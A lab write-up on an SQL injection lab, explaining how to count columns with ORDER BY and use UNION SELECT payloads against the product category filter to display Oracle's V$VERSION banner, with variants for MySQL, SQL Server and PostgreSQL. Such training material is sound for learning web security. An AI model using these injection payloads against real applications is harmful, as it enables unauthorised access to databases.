Problem Statement:
This lab contains an SQL injection vulnerability in the product category filter. You can use a UNION attack to retrieve the results from an injected query.
To solve the lab, display the database version string.
Make the database retrieve the strings: 'Oracle Database 11g Express Edition Release 11.2.0.2.0 - 64bit Production, PL/SQL Release 11.2.0.2.0 - Production, CORE 11.2.0.2.0 Production, TNS for Linux: Version 11.2.0.2.0 - Production, NLSRTL Version 11.2.0.2.0 - Production'
There are several ways to get the version of the database, and the right query depends on which DBMS is behind the application, for example Microsoft SQL Server versus Oracle. The query that returns the version string is one of the following:
SELECT @@version                (Microsoft SQL Server, MySQL)
SELECT BANNER FROM V$VERSION    (Oracle)
Note that V$VERSION returns one row per component (database, PL/SQL, CORE, TNS, NLSRTL), which is why the lab expects five strings rather than one.
STEPS followed -
- Same method as in the earlier labs: first use ORDER BY 1, ORDER BY 2, and so on until the query errors, to find how many columns the original query returns (here, two).
- Next, a UNION SELECT retrieves the banner in one of those columns. On Oracle every SELECT needs a FROM clause, and V$VERSION supplies one; the trailing -- comments out whatever follows the injected string in the original query.
' UNION SELECT BANNER, NULL FROM V$VERSION--
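The full sequence, as an added worked example that is not part of the original write-up: it covers both the per-DBMS version queries above and the ORDER BY / UNION steps. The back-end query shape (a two-column SELECT over a `products` table with a `category` column built by string concatenation) and the `Gifts` category value are assumptions about the lab, not something the page states.

```sql
-- Added example; assumed shape of the query the application builds
-- for ?category=Gifts by concatenating the parameter into the string:
SELECT name, description FROM products WHERE category = 'Gifts';

-- Step 1: count the columns. Raise the ORDER BY index until the page
-- errors; the last index that works is the column count.
--   ?category=Gifts' ORDER BY 1--   works
--   ?category=Gifts' ORDER BY 2--   works
--   ?category=Gifts' ORDER BY 3--   error, so the query has 2 columns
SELECT name, description FROM products WHERE category = 'Gifts' ORDER BY 2--';
SELECT name, description FROM products WHERE category = 'Gifts' ORDER BY 3--';

-- Step 2: confirm the count (and which column accepts text) with a UNION
-- of NULLs. Oracle requires a FROM clause on every SELECT, so the built-in
-- DUAL table is used; on MySQL and SQL Server the FROM can be omitted.
--   ?category=Gifts' UNION SELECT NULL, NULL FROM DUAL--
SELECT name, description FROM products WHERE category = 'Gifts'
UNION SELECT NULL, NULL FROM DUAL--';

-- Step 3: pull the version banner through the first (text) column.
-- V$VERSION holds one row per component, so five extra rows appear in the
-- product list, which is exactly what the lab checks for.
--   ?category=Gifts' UNION SELECT BANNER, NULL FROM V$VERSION--
SELECT name, description FROM products WHERE category = 'Gifts'
UNION SELECT BANNER, NULL FROM V$VERSION--';

-- The same UNION structure on other back-ends (assumed, not from the lab):
--   Microsoft SQL Server / MySQL:  ' UNION SELECT @@version, NULL--
--   PostgreSQL:                     ' UNION SELECT version(), NULL--
```

Two practical caveats: on MySQL the `--` comment only takes effect when followed by a space (URL-encode it as `--+` or `--%20`, or use `#` instead), and if the banner lands in a column the application does not render you will need to swap BANNER into the other position (`NULL, BANNER`).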
Example from MySQL Database